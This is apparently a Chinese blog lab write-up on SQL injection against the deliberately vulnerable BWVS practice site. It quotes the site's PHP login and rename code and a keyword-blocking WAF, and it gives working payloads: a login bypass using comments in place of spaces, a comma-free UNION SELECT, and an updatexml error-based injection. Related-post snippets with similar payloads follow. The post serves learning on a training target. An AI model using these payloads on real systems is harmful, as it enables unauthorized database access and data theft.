BWVS-SQL联合查询注入

最新推荐文章于 2024-07-11 00:29:01 发布
最新推荐文章于 2024-07-11 00:29:01 发布
阅读量994 收藏 6
点赞数 1
文章标签: BWVS SQL联合查询注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014029795/article/details/103208672
版权

0x00 联合查询注入

联合查询注入指的是可以利用union select语句去进行sql注入的一种方法。
但是要记得,联合查询注入需要有前端回显,并且要找到回显点,常见用的方法就是order by来判断最大的列数。
作者提供的链接均失败了。。。 不过还是学习巩固了一翻

0x01 漏洞位置:/user/logCheck.php

一开始就坑爹,写的这两个位置,然后不能直接访问,先说logCheck.php吧,这个页面其实是在登陆页面login.php的,当提交到用户名和密码的时候就会把信息提交到logCheck.php
在这里插入图片描述
还是POST方式的,burpsuite弄起来,搞了半天,我擦,还有WAF

function login_waf($log_name){
    $black_str = "/(and|or|union|select|sleep|substr|order|order|by|where|from|rand|exp|updatexml|insert|update|dorp|delete|[,]|[\s]|[|]|[&])/";
    $log_name = preg_replace($black_str, "",$log_name);
    if(preg_match($black_str, $log_name)){
            $log_name = login_waf($log_name);
                    return $log_name;
            }
    return $log_name;
}

从这能看出来,做了循环的过滤关键字,双写不可能绕过了,但是没有区别大小写,可以大小写绕过,直接看语句吧。

<?php
include_once('../bwvs_config/sys_config.php');
if(isset($_POST['submit'])){
         if(!empty($_POST['user']) && !empty($_POST['pass'])){
                $clean_name = login_waf($_POST['user']);

                $clean_pass = login_waf($_POST['pass']);

        $sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_name ="."'"."$clean_name"."'"." AND DWVS_user_passwd="."'".md5("$clean_pass")."'";

        $data = mysqli_query($connect, $sql) or die('Mysql Error!!');
                mysqli_close($connect);
                if(mysqli_num_rows($data) == 1)
                {
                         $row = mysqli_fetch_array($data);
                          $_SESSION['user_id'] = $row['DWVS_user_id'];
                                  $_SESSION['user_name'] = $row['DWVS_user_name'];
                                  if(!empty($row['DWVS_user_favicon']))
                                  {
                                        $_SESSION['user_favicon'] = $row['DWVS_user_favicon'];
                                  }else
                                  {
                                        $rand_num = rand(1,4);
                                        $user_favicon = "../favicon/"."$rand_num".".jpg";
                                        $_SESSION['user_favicon'] = $user_favicon;
                                  }
                                header('Location: user.php');
                }else{
                                $_SESSION['login_error'] = 'Error';
                                header('Location: login.php');
                                }
                }else{
                                $_SESSION['login_error'] = 'Error';
                                header('Location: login.php');
                                }

}else
{
        not_find($_SERVER['PHP_SELF']);

用户名和密码都经过了WAF,语句是拿单引号闭合的。admin'#就可以直接进入后台,这里要注意的是字符里面有个\s,这个玩意是空白字符,也就是说空格也被过滤了,,也被过滤了,如果不知道admin,这样也可以进入后台a'/**/OR/**/1/**/lIMit/**/1/**/oFFset/**/0#
在这里插入图片描述
这还联合查询注入呢,不玩了不玩了,目前水平就感觉盲注还可以实现,骗人的鬼。。。
哈哈,我错了,我错了,前几天刚刚开始玩被这个靶场搞得有点上头,其实,被过滤了,还是可以做联合查询注入的,wooyun里面有方法,大家可以看具体可以看DVWA No [Comma] Sqli,于是构造了这样的一个payload。。。

-admin'/**/Union/**/Select/**/*/**/From(Select/**/Database())a/**/Join/**/(Select/**/Database())b/**/Join/**/(Select/**/Database())c/**/Join/**/(Select/**/Database())d/**/Join/**/(Select/**/Database())e #

在这里插入图片描述
哈哈,成了,作者牛逼!

0x02 漏洞位置:/user/updateName.php

改名字的地方,感觉坑多,我还是直接看源码吧。。。

<?php
include_once('../bwvs_config/sys_config.php');
if(isset($_POST['submit']) && !empty($_POST['user_name'])) {
        $clean_username = select_waf1($_POST['user_name']);
        $clean_username = XSS_reg($clean_username);
        $clean_user_id = clear_all($_POST['u_id']);
if(!is_numeric($clean_user_id))
 {
                $_SESSION['Uid_error'] = '非法的用户ID';
                header('Location: edit.php');
  }else{
        $sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_name ="."'"."$clean_username"."'";
    $data = mysqli_query($connect, $sql) or die(mysqli_error($connect));
        if(mysqli_num_rows($data) == 1){
                $_SESSION['update_error'] = 'error';
                header('Location: edit.php');
        }else{
        $sql_Up = "UPDATE dwvs_user_message SET DWVS_user_name = '$clean_username' WHERE DWVS_user_id = '$clean_user_id'";
        mysqli_query($connect,$sql_Up) or die(mysqli_error($connect));
        mysqli_close($connect);
        $_SESSION['user_name'] = $clean_username;
        header('Location: edit.php');
        }
  }
}else{
        not_find($_SERVER['PHP_SELF']);
}
?>

这尼玛怎么都不像可以联合查询注入的,GDX ,玩我呢。。。
在这里插入图片描述
去看了下waf代码,呵呵,太难了。。。
在这里插入图片描述
11111111' and updatexml(1,concat(0x7e,database(),0x7e),0) #我这水平就审计到了这个玩意,这真的能联合注入吗。。。。
在这里插入图片描述

0x03 比较明显的漏洞 /search.php

这个才是真正的联合查询注入。。。
感觉是我跟作者的水平差距水平太大了,所以搞不出来对应的漏洞吧。。。。。。

baynk
关注
专栏目录
sql联合查询注入
m0_65977612的博客
11-18 953
sql联合查询注入
SQL注入联合查询注入
forwardss的博客
03-05 459
SQL注入联合查询注入 知识点 union联合查询 order by information_schema limit select * from table limit m,n 其中m是指记录开始的index,从0开始,表示第一条记录 n是指从第m+1条开始,取n条。 select * from tablename limit 2,4 即取出第3条至第6条,4条记录 联合查询的步骤为: 1、判...
BWVS-SQL搜索型注入
baynk的博客
11-23 830
0x01 漏洞位置 /search.php 这次是真的是搜索型注入了。 对了,这是我提前去留言了的,很神奇不显示留言信息,源码里面都有输出的。。 源码里面发现,居然打错了大小写,算了,BWVS也被打成了DWVS,不影响还是能做的。 看下面一段waf代码。。。 if (!empty($_GET['search'])) { $content = $_GET['search']; ...
sql注入之联合详解
最新发布
2301_80679350的博客
07-11 1363
SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。
SQL联合查询注入
D1stiny的博客
04-27 198
获取字段的总数 使⽤ order by/group by 语句。通过往后边拼接数字,可确定字段数量,若⼤于该数字,则显示错误,若小于或等于该数字,页面正常。 select * from information_schema.tables order by 6 如图,因为一共有六个字段,所以order by 6时是正常的,order by 7时就会出错。 判断回显数据的字段的位置 使用http...
SQL注入-联合查询注入
m0_53820621的博客
08-10 3571
SQL注入-联合查询注入
SQL注入原理及实践(一)--SQL注入联合查询
dulirongdudu的博客
06-23 1318
SQL注入原理及实践(一)–SQL注入联合查询 1)判断注入类型 一般采用【1and1=2】去判断,当输入【1and1=2】时, 如果报错,则为数字型注入, 如果显示正常,则为字符型注入 原理如下: 假设数据库执行命令为:select * from table_name where id=$id $id为用户所控,当输入【1and1=2】时 如果该注入为数字型,则将会显示如下: select * from table_name where id=1and1=2 该语句中,id=1为真;1=2为假;an
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3620
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3633
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
71.网络安全渗透测试—[SQL注入篇10]—[SQLSERVER+ASP-联合查询注入]
qwsn
01-18 2288
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 联合查询注入 1、SQLSERVER 相关概念: 2、SQLSERVER+ASP 联合查询注入示例: (1)判断是否存在注入:`and/or逻辑判断` (2)判断列数:`order by` (3)联合查询注入—判断回显位:联合查询要求,联合查询的列与被联合查询的`列的个数和类型一致`,类型一致问题可以使用null值绕过。 (4)联合查询注入—查询系
网络安全--SQL注入sleep注入
weixin_43774199的博客
09-24 4077
课程目标:说明MySQL中sleep()、substr()、count()、length()等函数的用法,讲解盲注和ASCII码,组织实验使学生掌握sleep的注入方式。 任务目标:学会MySQL中sleep()、substr()、count()、length()等函数的用法,了解盲注和ASCII码,掌握sleep的注入方式。 A.MySQL中的sleep函数 MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数.
SQL注入---联合查询注入
孤的博客
10-13 941
注入条件 页面有显示位,即在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。 找的注入点→查询列数→找到显示位→获取列中的信息 注入点:http://192.168.1.3:8008/onews.asp?id=45 查询列数 http://192.168.1.3:8008/onews.asp?id=45 order by 猜测的列...
SQL注入--联合查询注入
buffedon的博客
05-03 466
SQL注入--获取数据库的信息欢迎使用Markdown编辑器获取表的列数获取表中某个列的值获取所有数据库的库名 欢迎使用Markdown编辑器 获取表的列数 获取表中某个列的值 获取所有数据库的库名 SELECT * from user WHERE name=002 UNION SELECT 11,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata LIMIT 0,1) ...
sql注入 联合查询
m0_70892020的博客
05-23 389
sql注入 联合查询
SQL注入联合查询
weixin_51909453的博客
12-24 460
SQL注入联合查询 SQL注入简介 SQL注入是网站存在最多也是比较简单的漏洞,主要原因是程序对用户输入的字符串没有进行过滤或处理不严谨,导致用户可以通过精心构造语句来非法获取数据库中的信息,SQL注入的首次公开讨论始于1998年左右,至今已有20多年的历史,被冠以漏洞之王的称号。 sql注入原理 sql语言即是结构化查询语言,通俗来讲就是操作数据库的语言,这些语句可以对数据库进行增、删、改、查等操作。 注入在这里即是将用户输入的数据拼接到原始代码中,从而使得被注入的数据被当做代码执行 sql注入的核心:
sql注入联合查询(Mysql
华丽的贵族
09-05 1307
联合注入 - 测试网站 phpstudy搭建的mysql网站 http://localhost/pentest/article.php?id=1 - 注入步骤 1.判断是否存在注入 输入and 1=1 未报错 输入and 1=2 报错 2.获取字段的总数: order by +数字 数字从1到4时4报错,所以网站字段为3 3.进行连接查询 http://localhost/pentest...
SQL联合查询注入学习
2301_80034711的博客
03-10 1135
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
如何通过联合查询注入,判断查询列数
06-02
注入攻击的目的是构造一组SQL语句,使得应用程序执行恶意用户构造的SQL语句,从而获得非法访问或窃取敏感信息。通过联合查询注入,攻击者可以利用UNION关键字将查询结果与恶意查询语句组合在一起,从而获取应用程序执行的数据库中的数据。 在使用联合查询注入的过程中,可以通过判断返回结果集的列数来验证注入是否成功。如果返回结果集的列数与攻击者预期的列数不一致,就说明注入失败。 以下是一个示例: 假设有一个查询语句如下: ``` SELECT column1, column2 FROM table1 WHERE id = '1'; ``` 攻击者可以构造一个恶意的查询语句,如下所示: ``` 1' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'table1' -- ``` 这个查询语句会和原始查询语句组合在一起,从而获取table1表的列名信息。注意,这里使用了'--'注释符,以防止在查询语句中出现语法错误。 如果注入成功,攻击者可以通过查询结果集的列数来验证注入是否成功。例如,可以使用以下语句获取结果集的列数: ``` SELECT count(*) FROM ( SELECT column1, column2 FROM table1 WHERE id = '1' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'table1' ) AS combined_results; ``` 如果返回的结果是2,说明注入成功,因为结果集中包含了2列数据,分别是column1和column2。如果返回的结果不是2,就说明注入失败。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值